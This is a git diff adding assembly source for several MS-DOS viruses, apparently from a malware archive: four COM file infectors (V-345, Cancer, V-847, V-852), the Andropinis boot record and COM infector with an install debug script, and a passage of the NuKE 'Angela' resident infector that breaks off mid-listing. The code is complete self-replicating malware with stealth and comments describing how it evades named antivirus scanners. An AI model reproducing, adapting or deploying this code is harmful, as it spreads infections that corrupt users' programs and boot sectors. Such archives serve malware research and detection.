a/MSDOS/Virus.MSDOS.Unknown.amst-345.asm b/MSDOS/Virus.MSDOS.Unknown.amst-345.asm new file mode 100644 index 00000000..a7067cd2 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.amst-345.asm @@ -0,0 +1,134 @@ + page ,132 + name V345 + title V-345 - a mutation of the V-845 virus + .radix 16 +code segment + assume cs:code,ds:code + org 100 + +timer equ 6C +olddta equ 80 +virlen = offset endcode - offset start +newid = offset ident - offset start + +start: + jmp short virus + +ident dw 'VI' +counter db 0 +allcom db '*.COM',0 +progbeg dd ? +eof dw ? +newdta db 2C dup (?) +fname equ offset newdta+1E + +virus: + push ax + mov ax,cs ;Move program code + add ax,1000 ; 64K bytes forward + mov es,ax + inc [counter] + mov si,offset start + xor di,di + mov cx,virlen + rep movsb + + mov dx,offset newdta ;Set new Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + mov dx,offset allcom ;Search for '*.COM' files + mov cx,110b ;Normal, Hidden or System + mov ah,4E ;Find First file + int 21 + jc done ;Quit if none found + +mainlp: + mov dx,fname + mov ax,3D02 ;Open file in Read/Write mode + int 21 + mov bx,ax ; Save handle + push es + pop ds + mov dx,virlen + mov cx,0FFFF ;Read all bytes (64K max in .COM file) + mov ah,3F ;Read from handle + int 21 ;Bytes read in AX + add ax,virlen + mov cs:[eof],ax ;Save pointer to the end of file + cmp ds:[newid+virlen],'VI' ;Infected? + je close ;Go find next file if so + + xor cx,cx ;Go to file beginning + mov dx,cx + mov ax,4200 ;LSEEK from the beginning of the file + int 21 + jc close ;Leave this file if error occures + + xor dx,dx ;Write the whole code (virus+file) + mov cx,cs:[eof] ; back onto the file + mov ah,40 ;Write to handle + int 21 + +close: + mov ah,3E ;Close the file + int 21 + + push cs + pop ds ;Restore DS + mov ah,4F ;Find next matching file + int 21 + jc done ;Exit if all found + jmp mainlp ;Otherwise loop again + +done: + mov dx,olddta ;Restore old Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + + cmp [counter],5 ;If counter goes above 5, + jb progok ; the program becomes "sick" + mov ax,40 + mov ds,ax ;Get the system timer value + mov ax,word ptr [timer] + push cs + pop ds ;Restore DS + and ax,1 ;At random (if timer value is odd) + jz progok ; display the funny message + mov dx,offset message + mov ah,9 ;Print string + int 21 + int 20 ;Terminate program + +message db 'Program sick error:Call doctor or ' + db 'buy PIXEL for cure description',0A,0Dh,'$' + +progok: + mov si,offset transf ;Move this part of code + mov cx,offset endcode - offset transf ;Code length + xor di,di ;Move to ES:0 + rep movsb ;Do it + + pop bx ; BX = old AX + mov word ptr cs:[progbeg],0 + mov word ptr cs:[progbeg+2],es ;Point progbeg at program start + jmp cs:[progbeg] ;Jump at program start + +transf: + push ds + pop es + mov si,offset endcode + mov di,offset start + mov cx,0FFFF ;Restore original program's code + sub cx,si + rep movsb + mov word ptr cs:[start],offset start + mov word ptr cs:[start+2],ds + mov ax,bx + jmp dword ptr cs:[start] ;Jump to program start +endcode label byte + + int 20 ;Dummy program + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.amst-740.asm b/MSDOS/Virus.MSDOS.Unknown.amst-740.asm new file mode 100644 index 00000000..11686803 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.amst-740.asm @@ -0,0 +1,128 @@ + page ,132 + name CANCER + title Cancer - a mutation of the V-847 virus + .radix 16 +code segment + assume cs:code,ds:code + org 100 + +olddta equ 80 +virlen equ offset endcode - offset start +smalcod equ offset endcode - offset transf +buffer equ offset endcode + 100 +newdta equ offset endcode + 10 +fname = newdta + 1E +virlenx = offset endcode - offset start + +start: + jmp cancer + +ident dw 'VI' +counter db 0 +allcom db '*.COM',0 +vleng db virlen +n_10D db 3 ;Unused +progbeg dd ? +eof dw ? +handle dw ? + +cancer: + mov ax,cs ;Move program code + add ax,1000 ; 64K bytes forward + mov es,ax + inc [counter] + mov si,offset start + xor di,di + mov cx,virlen + rep movsb + + mov dx,newdta ;Set new Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + mov dx,offset allcom ;Search for '*.COM' files + mov cx,110b ;Normal, Hidden or System + mov ah,4E ;Find First file + int 21 + jc done ;Quit if none found + +mainlp: + mov dx,offset fname + mov ax,3D02 ;Open file in Read/Write mode + int 21 + mov [handle],ax ;Save handle + mov bx,ax + push es + pop ds + mov dx,buffer + mov cx,0FFFF ;Read all bytes + mov ah,3F ;Read from handle + int 21 ;Bytes read in AX + add ax,buffer + mov cs:[eof],ax ;Save pointer to the end of file + + xor cx,cx ;Go to file beginning + mov dx,cx + mov bx,cs:[handle] + mov ax,4200 ;LSEEK from the beginning of the file + int 21 + jc close ;Leave this file if error occures + + mov dx,0 ;Write the whole code (virus+file) + mov cx,cs:[eof] ; back onto the file + mov bx,cs:[handle] + mov ah,40 ;Write to handle + int 21 + +close: + mov bx,cs:[handle] + mov ah,3E ;Close the file + int 21 + + push cs + pop ds ;Restore DS + mov ah,4F ;Find next matching file + mov dx,newdta + int 21 + jc done ;Exit if all found + jmp mainlp ;Otherwise loop again + +done: + mov dx,olddta ;Restore old Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + + mov si,offset transf ;Move this part of code + mov cx,smalcod ;Code length + xor di,di ;Move to ES:0 + rep movsb ;Do it + + xor di,di ;Clear DI + mov word ptr cs:[progbeg],0 + mov word ptr cs:[progbeg+2],es ;Point progbeg at program start + jmp cs:[progbeg] ;Jump at program start + +transf: + push ds + pop es + mov si,buffer+100 + cmp [counter],1 + jne skip + sub si,200 +skip: + mov di,offset start + mov cx,0FFFF ;Restore original program's code + sub cx,si + rep movsb + mov word ptr cs:[start],offset start + mov word ptr cs:[start+2],ds + jmp dword ptr cs:[start] ;Jump to program start +endcode label byte + + int 20 ;Dummy program + int 20 ;??? + + db 0 ;Unused + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.amst-847.asm b/MSDOS/Virus.MSDOS.Unknown.amst-847.asm new file mode 100644 index 00000000..b9c4899e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.amst-847.asm @@ -0,0 +1,150 @@ + page ,132 + name V847 + title The V-847 virus + .radix 16 +code segment + assume cs:code,ds:code + org 100 + +timer equ 6C +olddta equ 80 +virlen equ offset endcode - offset start +smalcod equ offset endcode - offset transf +buffer equ offset endcode + 100 +newdta equ offset endcode + 10 +fname = newdta + 1E +virlenx = offset endcode - offset start +newid = offset ident + virlenx + 100 + +start: + jmp virus + +ident dw 'VI' +counter db 0 +allcom db '*.COM',0 +vleng dw 44F ;Unused +progbeg dd 10000h +eof dw ? +handle dw ? + +virus: + mov ax,cs ;Move program code + add ax,1000 ; 64K bytes forward + mov es,ax + inc [counter] + mov si,offset start + xor di,di + mov cx,virlen + rep movsb + + mov dx,newdta ;Set new Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + mov dx,offset allcom ;Search for '*.COM' files + mov cx,110b ;Normal, Hidden or System + mov ah,4E ;Find First file + int 21 + jc done ;Quit if none found + +mainlp: + mov dx,offset fname + mov ax,3D02 ;Open file in Read/Write mode + int 21 + mov [handle],ax ;Save handle + mov bx,ax + push es + pop ds + mov dx,buffer + mov cx,0FFFF ;Read all bytes + mov ah,3F ;Read from handle + int 21 ;Bytes read in AX + add ax,buffer + mov cs:[eof],ax ;Save pointer to the end of file + db 3E ;Force DS: prefix + cmp [newid],'VI' ;Infected? + je close ;Go find next file + + xor cx,cx ;Go to file beginning + mov dx,cx + mov bx,cs:[handle] + mov ax,4200 ;LSEEK from the beginning of the file + int 21 + jc close ;Leave this file if error occures + + mov dx,0 ;Write the whole code (virus+file) + mov cx,cs:[eof] ; back onto the file + mov bx,cs:[handle] + mov ah,40 ;Write to handle + int 21 + +close: + mov bx,cs:[handle] + mov ah,3E ;Close the file + int 21 + + push cs + pop ds ;Restore DS + mov ah,4F ;Find next matching file + mov dx,newdta + int 21 + jc done ;Exit if all found + jmp mainlp ;Otherwise loop again + +done: + mov dx,olddta ;Restore old Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + + cmp [counter],5 ;If counter goes above 5, + jb progok ; the program becomes "sick" + mov ax,40 + mov ds,ax ;Get the system timer value + mov ax,word ptr ds:[timer] + push cs + pop ds ;Restore DS + and ax,1 ;At random (if timer value is odd) + jz progok ; display the funny message + mov dx,offset message + mov ah,9 ;Print string + int 21 + int 20 ;Terminate program + +message db 'Program sick error:Call doctor or ' + db 'buy PIXEL for cure description',0A,0Dh,'$' + +progok: + mov si,offset transf ;Move this part of code + mov cx,smalcod ;Code length + xor di,di ;Move to ES:0 + rep movsb ;Do it + + xor di,di ;Clear DI + mov word ptr cs:[progbeg],0 + mov word ptr cs:[progbeg+2],es ;Point progbeg at program start + jmp cs:[progbeg] ;Jump at program start + +transf: + push ds + pop es + mov si,buffer+100 + cmp [counter],1 + jne skip + sub si,200 +skip: + mov di,offset start + mov cx,0FFFF ;Restore original program's code + sub cx,si + rep movsb + mov word ptr cs:[start],offset start + mov word ptr cs:[start+2],ds + jmp dword ptr cs:[start] ;Jump to program start +endcode label byte + + int 20 ;Dummy program + int 20 ;??? + + dw 0 ;Unused + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.amst-852.asm b/MSDOS/Virus.MSDOS.Unknown.amst-852.asm new file mode 100644 index 00000000..1f919a05 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.amst-852.asm @@ -0,0 +1,155 @@ + page ,132 + name V852 + title The V-852 virus, based on the V-847 virus + .radix 16 +code segment + assume cs:code,ds:code + org 100 + +timer equ 6C +olddta equ 80 +virlen equ offset endcode - offset start +smalcod equ offset endcode - offset transf +buffer equ offset endcode + 100 +newdta equ offset endcode + 10 +fname = newdta + 1E +virlenx = offset endcode - offset start +newid = offset ident + virlenx + 100 + +start: + jmp virus + +ident dw 'SS' +counter db 0 +allcom db '*.COM',0 +vleng dw 44F ;Unused +progbeg dd 10000h +eof dw ? +handle dw ? + +virus: + mov ax,cs ;Move program code + add ax,1000 ; 64K bytes forward + mov es,ax + inc [counter] + mov si,offset start + xor di,di + mov cx,virlen + rep movsb + + mov dx,newdta ;Set new Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + mov dx,offset allcom ;Search for '*.COM' files + mov cx,110b ;Normal, Hidden or System + mov ah,4E ;Find First file + int 21 + jc done ;Quit if none found + +mainlp: + mov dx,offset fname + mov ax,3D02 ;Open file in Read/Write mode + int 21 + mov [handle],ax ;Save handle + mov bx,ax + push es + pop ds + mov dx,buffer + mov cx,0FFFF ;Read all bytes + mov ah,3F ;Read from handle + int 21 ;Bytes read in AX + add ax,buffer + mov cs:[eof],ax ;Save pointer to the end of file + db 3E ;Force DS: prefix + cmp ds:[newid],'SS' ;Infected? + je close ;Go find next file + + xor cx,cx ;Go to file beginning + mov dx,cx + mov bx,cs:[handle] + mov ax,4200 ;LSEEK from the beginning of the file + int 21 + jc close ;Leave this file if error occures + + mov dx,0 ;Write the whole code (virus+file) + mov cx,cs:[eof] ; back onto the file + mov bx,cs:[handle] + mov ah,40 ;Write to handle + int 21 + +close: + mov bx,cs:[handle] + mov ah,3E ;Close the file + int 21 + + push cs + pop ds ;Restore DS + mov ah,4F ;Find next matching file + mov dx,newdta + int 21 + jc done ;Exit if all found + jmp mainlp ;Otherwise loop again + +done: + mov dx,olddta ;Restore old Disk Transfer Address + mov ah,1A ;Set DTA + int 21 + + cmp [counter],5 ;If counter goes above 5, + jb progok ; the program becomes "sick" + mov ax,40 + mov ds,ax ;Get the system timer value + mov ax,word ptr ds:[timer] + push cs + pop ds ;Restore DS + and ax,1 ;At random (if timer value is odd) + jz progok ; display the funny message + mov dx,offset message + mov ah,9 ;Print string + int 21 + int 20 ;Terminate program + +message db 0A, 0Dh, 7 + db ' ! ' + db ' !' + db 0A, 0Dh,'$' + +progok: + mov si,offset transf ;Move this part of code + mov cx,smalcod ;Code length + xor di,di ;Move to ES:0 + rep movsb ;Do it + + xor di,di ;Clear DI + mov word ptr cs:[progbeg],0 + mov word ptr cs:[progbeg+2],es ;Point progbeg at program start + jmp cs:[progbeg] ;Jump at program start + +transf: + push ds + pop es + mov si,buffer+100 + cmp [counter],1 + jne skip + sub si,200 +skip: + mov di,offset start + mov cx,0FFFF ;Restore original program's code + sub cx,si + rep movsb + mov word ptr cs:[start],offset start + mov word ptr cs:[start+2],ds + jmp dword ptr cs:[start] ;Jump to program start +endcode label byte + + jmp short quit ; The original program + + db 2 dup (90) ; Filler + +quit: + mov ax,4C00 ; Just exit with ErrorLevel 0 + int 21 + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.andropin.asm b/MSDOS/Virus.MSDOS.Unknown.andropin.asm new file mode 100644 index 00000000..19b1b228 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.andropin.asm @@ -0,0 +1,408 @@ +;****************************************************************************** +; +; Virus name : Andropinis +; Author : Rajaat +; Origin : United Kingdom, March 1995 +; Compiling : Using TASM | Using A86 +; | +; TASM /M2 ANDROPIN.ASM | A86 ANDROPIN.ASM +; TLINK ANDROPIN | +; EXE2BIN ANDROPIN | +; Installing : Place the produced BIN file at cylinder 0, head 0, sector 2 +; Modify the partition record to point to this code +; (a debug script is provided at the end of this source) +; Targets : Master Boot Record & COM files +; Size : 512 bytes +; Polymorphic : No +; Encrypted : No +; Stealth : Full Stealth on Master Boot Record +; Tunneling : No - is not needed if started from Master boot record +; Retrovirus : No +; Antiheuristics: Yes - for TBAV +; Peculiarities : Infects MBR by modifying 2 bytes +; Uses SFT's to infect COM files +; Avoids Thunderbyte Antivirus using a 2 byte signature! +; Behaviour : When an infected COM file is run, the virus will not become +; resident, but will first infect the master boot record. It +; does its work in a very peculiar way. It modifies the +; 1st partition record with the result that it points to +; cylinder 0, head 0, sector 2. The viral bootsector will be +; stored there. The next time when a system is booted, +; Andropinis will become resident in high memory, but below +; the top of memory. Programs like CHKDSK.EXE will show a +; decrease in system memory of 1024 bytes. The virus will hook +; interrupt 13 at this time and wait till interrupt 21 is +; captured 3 times. Andropinis will then take interrupt 21 +; itself. The virus is now stealth on the master boot record, +; only modifying the pointer to the bootsector in memory when +; the master boot record is read. The virus will infect COM +; files when copied, therefore not needing a critical interrupt +; handler. Andropinis will only infect COM files when they are +; between 4095 and 61441 bytes. Infected files will begin with +; a PUSH AX, DEC BX, NOP and a near jump to the virus code. +; The first 2 instructions will cause the Thunderbyte scanner +; to avoid the file. It thinks it's processed with PkLite! f +; Even the "ex"tract option doesn't work and gives back a "N/A" +; for every infected file. F-PROT detects nothing, except when +; the /ANALYSE option is used. AVP gives a virus "Type Boot" +; suspicion. How true that is. The weak point of the virus is +; its lack of protection in infected COM files, so it relies on +; the fact that the Master Boot Record infection isn't visible. +; Tai-Pan spread also far, and was even more simplistic than +; Andropinis, with the exception that is infected the more +; common filetype, the EXE file. The virus doesn't do any +; intended harm, as Patty would say : +; "It's unknown what this virus does besides replicate." +; Yoho's : VLAD, Immortal Riot, Phalcon/Skism, [NuKE], +; and all other virus writers that exist. +; +;****************************************************************************** + +.model tiny ; this must become a BIN file + +.code ; let's start with the code, ok + +.radix 16 ; safe hex + + org 0 ; throw it in the bin + +;****************************************************************************** +; Viral boot sector +;****************************************************************************** + +virus: xor bx,bx ; initialise stack and data + cli ; segment + mov ss,bx ; + mov ds,bx ; + mov sp,7c00 ; + push sp ; + sti ; + + mov si,413 ; steal some memory from the + dec word ptr [si] ; top + lodsw ; + + mov cl,6 ; calculate free segment for + shl ax,cl ; virus + mov es,ax ; + + pop si + mov di,bx ; push data for a far jump to + push di ; the virus code in high memory + push es ; + lea ax,init_resident ; + push ax ; + + mov cx,100 ; move the code to high memory +move_boot: movsw ; this doesn't trigger tbav + loop move_boot ; + + retf ; return to the address pushed + +;****************************************************************************** +; the following piece of code is executed in high memory +;****************************************************************************** + +init_resident: mov byte ptr cs:hook_21_flag,0 ; reset int 21 hook flag + + lea di,old_13 ; store old int 13 vector and + mov si,4*13 ; replace it with our new + lea ax,new_13 ; handler + xchg ax,[si] ; + stosw ; + mov ax,cs ; + xchg ax,[si+2] ; + stosw ; + + mov si,4*21 ; store new address to int 21 + lea ax,new_21 ; vector + xchg ax,[si] ; + mov ax,cs ; + xchg ax,[si+2] ; + + pop es ; read the original bootsector + push es ; and execute it + mov ax,0201 ; + mov dx,180 ; + mov cx,1 ; + mov bx,7c00 ; + push bx ; + int 13h ; + retf ; + +;****************************************************************************** +; new int 13 handler +;****************************************************************************** + +new_13: cmp ax,5001 ; installation check + jne no_inst_check ; + xchg ah,al ; + iret + +no_inst_check: cmp ah,2 ; check if partition sector + jne no_stealth ; is read. if not, there's + cmp dx,80 ; no need to use stealth + jne no_stealth ; + cmp cx,1 ; + jne no_stealth ; + + pushf ; perform read action, and + call dword ptr cs:[old_13] ; go to stealth_mbr if no error + jnc stealth_mbr ; occured + retf 2 ; + +stealth_mbr: cmp word ptr es:1bf[bx],200 ; is the virus active? + jne not_infected ; no, goto not_infected + mov word ptr es:1bf[bx],0101 ; stealth virus +not_infected: iret ; + +no_stealth: cmp byte ptr cs:[hook_21_flag],3; if this is try 3 to get int + je eoi_13 ; 21, get lost to eoi_13 + + push ax ; preserve these + push ds ; + + xor ax,ax ; is int 21 changed? + mov ds,ax ; + mov ax,cs ; + cmp ax,word ptr ds:[4*21+2] ; + je int_21_ok ; no, int 21 is ok + + inc byte ptr cs:[hook_21_flag] ; increase the hook int 21 flag + + lea ax,new_21 ; capture int 21 and store + xchg ax,ds:[4*21] ; the old vector + mov word ptr cs:old_21,ax ; + mov ax,cs ; + xchg ax,ds:[4*21+2] ; + mov word ptr cs:old_21[2],ax ; + +int_21_ok: pop ds ; get these back + pop ax ; + +eoi_13: jmp dword ptr cs:[old_13] ; chain to old int 13 + +;****************************************************************************** +; new int 21 handler +;****************************************************************************** + +new_21: cmp ah,40 ; is a write command performed? + je write_to_file ; yeah, write_to_file + +eoi_21: jmp dword ptr cs:[old_21] ; chain to old int 21 + +write_to_file: push ax ; preserve some registers + push bx ; + push dx ; + push di ; + push es ; + + mov ax,4400 ; check if the write belongs + int 21 ; to a device + test dl,80 ; + jnz not_suitable ; + + mov ax,1220 ; find file handle table that + int 2f ; belongs to the handle in bx + mov bl,byte ptr es:[di] ; + mov ax,1216 ; + int 2f ; + + mov bx,2020 ; check if the file has a com + mov ax,word ptr es:[di+28] ; extension + or ax,bx ; + cmp ax,'oc' ; + jne not_suitable ; + mov al,byte ptr es:[di+2a] ; + or al,bl ; + cmp al,'m' ; + jne not_suitable ; + + cmp word ptr es:[di+11],0 ; check if file length is + jne not_suitable ; zero + + cmp cx,1000 ; check if piece of code is + jb not_suitable ; not too short or too long + cmp cx,0f000 ; + ja not_suitable ; + + pop es ; these registers are done + pop di ; + pop dx ; + + mov bx,dx ; check if the file is a + cmp word ptr ds:[bx],'ZM' ; renamed exe file + je is_renamed_exe ; + + cmp word ptr ds:[bx+2],0e990 ; check if already infected + jne infect_com ; + jmp is_renamed_exe + +not_suitable: pop es ; done with this interrupt + pop di ; service routine, so chain + pop dx ; to the old 21 routine +is_renamed_exe: pop bx ; + pop ax ; + jmp eoi_21 ; + +;****************************************************************************** +; piece of code that infects a COM file +;****************************************************************************** + +infect_com: pop bx ; this register was done + + push cx ; get the first 6 bytes of the + push si ; host and overwrite them with + add cx,offset com_entry-6 ; the new bytes. it places a + mov si,dx ; nifty piece of code to + mov ax,'KP' ; render tbscans heuristics + xchg word ptr [si],ax ; useless. the PUSH AX, DEC BX + mov word ptr cs:org_com,ax ; (PK) in the begin of the + lodsw ; program makes tbscan think + mov ax,0e990 ; it is a PkLite compressed + xchg word ptr ds:[si],ax ; file and will skip it! + mov word ptr cs:org_com+2,ax ; + lodsw ; + xchg word ptr ds:[si],cx ; + mov word ptr cs:org_com+4,cx ; + pop si ; + pop cx ; + + pop ax ; perform original write + pushf ; command + call dword ptr cs:[old_21] ; + + push ax ; and append the virus at the + push cx ; end of the file + push dx ; + push ds ; + push cs ; + pop ds ; + mov ah,40 ; + mov cx,virus_length_b ; + lea dx,virus ; + pushf ; + call dword ptr cs:[old_21] ; + pop ds ; + pop dx ; + pop cx ; + pop ax ; + retf 2 ; + +;****************************************************************************** +; this gets executed by an infected COM file +;****************************************************************************** + +com_entry: call get_offset ; old hat for getting the +get_offset: pop bp ; delta offset + sub bp,offset get_offset ; + + mov ax,5001 ; if the virus is resident it + int 13 ; doesn't need to infect the + cmp ax,0150 ; master boot record + je is_active ; + + mov ax,0201 ; read master boot record. + lea bx,heap[bp] ; if an error occured, goto + mov cx,1 ; is_active + mov dx,80 ; + int 13 ; + jc is_active ; + + cmp word ptr [bx+1be+1],0101 ; test if the partition begins + jne is_active ; at the normal sector + + test byte ptr [bx+1be],80 ; test of the partition is + jz is_active ; bootable + + mov al,byte ptr [bx+1be+4] ; test if the partition type + cmp al,4 ; is ok + jb is_active ; + cmp al,6 ; + ja is_active ; + + mov word ptr [bx+1be+1],200 ; change pointer to virus code + + mov ax,0301 ; write back the master boot + push ax ; record. quit if error + int 13 ; occured + pop ax ; + jc is_active ; + + inc cx ; write virus to sector 2 + lea bx,virus[bp] ; (right behind the mbr) + int 13 ; + +is_active: lea si,org_com[bp] ; restore beginning of the + mov di,100 ; host and execute it + pop ax ; + push cs ; + push di ; + movsw ; + movsw ; + movsw ; + retf ; + +;****************************************************************************** +; some data used by the virus +;****************************************************************************** + + db '[Andropinis]' ; my childs name + db ' by Rajaat',0 ; my name + + org 1fe ; for the bootsector + + db 55,0aa ; boot signature + +;****************************************************************************** +; the things below aren't copied into the viral boot sector, only in COM files +;****************************************************************************** + +org_com equ $ ; original program data + +heap equ $+6 ; memory for data + +virus_length_b equ heap-virus ; who says size doesn't count? +virus_length_s equ (virus_length_b+1ff) / 200 ; +virus_length_k equ (virus_length_b+3ff) / 400 ; + +old_13 equ heap+6 ; old int 13 vector +old_21 equ heap+0a ; old int 21 vector +hook_21_flag equ heap+0e ; int 21 hook flag + +end virus ; the end complete +end ; +;****************************************************************************** + +; remove the piece below if you use A86 instead of TASM, because it will +; choke on it + + --- debug script for installing the Andropinis virus --- + +install with +DEBUG ANDROPIN.BIN < scriptname +where scriptname is the name that you give to the mess below + + --- cut here --- +m 100 l200 1000 +a +mov ax,0201 +mov bx,800 +mov cx,1 +mov dx,80 +int 13 +mov si,9bf +mov word ptr [si],200 +mov ax,0301 +mov dx,80 +int 13 +mov ax,0301 +mov bx,1000 +inc cx +int 13 +int 20 + +g +q + --- cut here --- + diff --git a/MSDOS/Virus.MSDOS.Unknown.angela.asm b/MSDOS/Virus.MSDOS.Unknown.angela.asm new file mode 100644 index 00000000..a88a571f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.angela.asm @@ -0,0 +1,841 @@ +;=============================================================================== +; +; (c) 1993 by NuKE Computer Security Publications, Inc. +; Developed by Rock Steady of NuKE Inc. +; +; +; +virus_size equ last - init_virus ;virus size (bytes) + +seg_a segment byte public + assume cs:seg_a,ds:seg_a + + org 100h ;compile to .com + +start: jmp init_virus + +;------------------------------------------------------------------------------- +init_virus: call doit_now ;begin virus + +doit_now: pop bp ;pop call offset + sub bp,offset doit_now ;fix it with pointer + + push ax + push bx ;save the registers + push cx + push dx + push si + push ds + + + mov byte ptr cs:[tb_here][bp],00h + xor dx,dx ;dx=0 + mov ds,dx ;ds=0 + mov ax,word ptr ds:[0006h] ;ax=0000:0006 segment of + ; int 1h + mov ds,ax ;ds=segment of int 1 + mov cx,0FFFFh ;cx=64k + mov si,dx ;si=0 + +look_4_tbclean: cmp word ptr ds:[si],0A5F3h ;look TBClean in memory + je check_it ;jmp if its TBClean +look_again: inc si ;if not continue looking + loop look_4_tbclean + jmp not_found ;not found cont normal + +check_it: cmp word ptr ds:[si+2],0C7FAh ;check TBClean string + jne look_again ;jmp =! tbclean + cmp word ptr ds:[si+4],0006h ;check TBClean string + jne look_again ;jmp =! tbclean + cmp word ptr ds:[si+10],020Eh ;check TBClean string + jne look_again ;jmp =! tbclean + cmp word ptr ds:[si+12],0C700h ;check TBClean string + jne look_again ;jmp =! tbclean + cmp word ptr ds:[si+14],0406h ;check TBClean string + jne look_again ;jmp =! tbclean + + mov bx,word ptr ds:[si+17] ;steal REAL int 1 offset + mov byte ptr ds:[bx],0CFh ;replace with IRET + + mov bx,word ptr ds:[si+27] ;steal REAL int 3 offset + mov byte ptr ds:[bx],0CFh ;replece with IRET + + mov byte ptr cs:[tb_here][bp],01h ;set the TB flag on + + mov bx,word ptr ds:[si+51h] ;get 2nd segment of ints + mov word ptr cs:[tb_int2][bp],bx ;vector table + + mov bx,word ptr ds:[si-5] ;get offset of 1st copy + mov word ptr cs:[tb_ints][bp],bx ;of vector table + +not_found: xor dx,dx + push ds + mov ds,dx ;put that in ds + les si,dword ptr ds:[0084h] ;get int21 vector + mov word ptr cs:[int21][bp],si ;save int21 offset + mov word ptr cs:[int21+2][bp],es ;save int21 segment + + les si,dword ptr ds:[0070h] ;get int1c vector + mov word ptr cs:[int1c][bp],si ;save int1c offset + mov word ptr cs:[int1c+2][bp],es ;save int1c segment + + les si,dword ptr ds:[004ch] ;get int13 vector + mov word ptr cs:[int13][bp],si ;save int13 offset + mov word ptr cs:[int13+2][bp],es ;save int13 segment + pop ds + + mov byte ptr cs:[mcb][bp],00h ;reset the TB mcb flag + mov ax,0abcdh ;test if virus is here? + int 13h + cmp bx,0abcdh ;is it? + jne install_virus ;jmp, if not & install +leave_mcb: jmp exit_mem ;yes, leave then + +;--------- Going Resident ------ + +steal_some: mov al,byte ptr cs:[mcb][bp] ;if tb is here, steal + cmp al,0ffh ;memory from it! + je leave_mcb ;error? exit then + inc byte ptr cs:[mcb][bp] ;inc flag + cmp al,01 ; + ja mcb3_1 + +install_virus: mov ah,52h ;get the list of lists + int 21h ;use dos + mov ax,es:[bx-2] ;get first mcb chain + + mov es,ax ;es=segment of 1st mcb +mcb1: cmp byte ptr es:[0000h],'Z' ;is it the last mcb + jne mcb2 ;jmp if not + clc ;yes last mcb, CLC + jmp short mcbx ;outta here + +mcb2: cmp byte ptr es:[0000h],'M' ;is it in the chain + je mcb3 ;jmp if yes + stc ;error, set carry flag + jmp short mcbx ;outta here + +mcb3: cmp byte ptr cs:[mcb][bp],0 ;is TB flag off? + je mcb3_1 ;if yes, then jmp + mov dx,ds ;else cmp TB ds + sub dx,10h ;ds-10 + cmp word ptr es:[0001h],dx ;cmp to mcb owner. + je mcbx_1 + +mcb3_1: mov ax,es ;ax=es + add ax,word ptr es:[0003h] ;ax=es + next mcb + inc ax ;get mcb + mov es,ax ;es=ax:next mcb chain + jmp short mcb1 ;goto first step + +mcbx: jc leave_mcb ;if error, exit +mcbx_1: cmp word ptr es:[0003],(virus_size/16) + 11h + jb steal_some + mov byte ptr es:[0000],'Z' ;the last mcb chain! + sub word ptr es:[0003],(virus_size/16) + 11h + add ax,word ptr es:[0003h] ;figure out segment + inc ax ;add 16 bytes + mov es,ax ;new segment in es + mov di,103h ;offset is 103h + push ds ;save TB ds location + push cs + pop ds ;virus cs=ds + mov si,offset init_virus ;si=top of virus + add si,bp ;add delta + mov cx,virus_size ;move virus_size + cld ;clear direction flag + repne movsb ;do it Mr. Crunge + + mov ds,cx ;ds=0000 +hook_again: cli ;disable ints + mov word ptr ds:[0084h],offset int21_handler ;hook int21 + mov word ptr ds:[0086h],es + mov word ptr ds:[0070h],offset int1c_handler ;hook int1c + mov word ptr ds:[0072h],es + mov word ptr ds:[004ch],offset int13_handler ;hook int13 + mov word ptr ds:[004eh],es + sti ;enable ints + + cmp byte ptr cs:[tb_here][bp],00h ;was TB found? + je go_on ;no, then jmp + cmp cl,01h ;is this the 2nd x here? + je go_on ;yes, then jmp + mov ds,word ptr cs:[tb_int2][bp] ;get TB int segment + inc cl ;inc cl + jmp short hook_again ;hook ints again + +go_on: pop ds ;get TB code segment + cmp byte ptr cs:[tb_here][bp],01h ;TB here? + je hook_tb_ints ;yes, then jmp + jmp exit_mem ;else exit +hook_tb_ints: mov si,word ptr cs:[tb_ints][bp] ;get TB int offset + mov word ptr ds:[si+84h],offset int21_handler + mov word ptr ds:[si+86h],es + mov word ptr ds:[si+70h],offset int1c_handler + mov word ptr ds:[si+72h],es + mov word ptr ds:[si+4ch],offset int13_handler + mov word ptr ds:[si+4eh],es + +exit_mem: cmp word ptr cs:[buffer][bp],5A4Dh ;.exe file? + je exit_exe_file ;yupe exit exe file + cmp word ptr cs:[buffer][bp],4D5Ah ;.exe file? + je exit_exe_file ;yupe exit exe file + push cs ;fix cs=ds for .com + pop ds + mov bx,offset buffer ;get first 3 bytes + add bx,bp ;fix delta + mov ax,[bx] ;move first 2 bytes + mov word ptr ds:[100h],ax ;put em in the beginning + inc bx ;inc pointer + inc bx + mov al,[bx] ;get last of 3rd byte + mov byte ptr ds:[102h],al ;put that in place + pop ds + pop si + pop dx + pop cx + pop bx + pop word ptr cs:[ax_reg][bp] ;save ax else where + mov ax,100h + push ax ;fake a CALL & RETN + mov ax,word ptr cs:[ax_reg][bp] ;put ax as normal + retn ;link to 100h + +exit_exe_file: mov dx,ds ;get psp=ds seg + add dx,10h ;add 16bytes to seg + pop ds + pop si + pop word ptr cs:[ax_reg][bp] + pop cx + pop bx + pop ax + add word ptr cs:[buffer+22][bp],dx ;fix segments + add dx,word ptr cs:[buffer+14][bp] + cli + mov ss,dx ;restore ss + mov sp,word ptr cs:[buffer+16][bp] ;and sp + sti + mov dx,word ptr cs:[ax_reg][bp] + jmp dword ptr cs:[buffer+20][bp] ;jmp to entry pt. + +mcb db 0 +ax_reg dd 0 +int13 dd 0 +int1c dd 0 +int21 dd 0 +tb_ints dd 0 +tb_here db 0 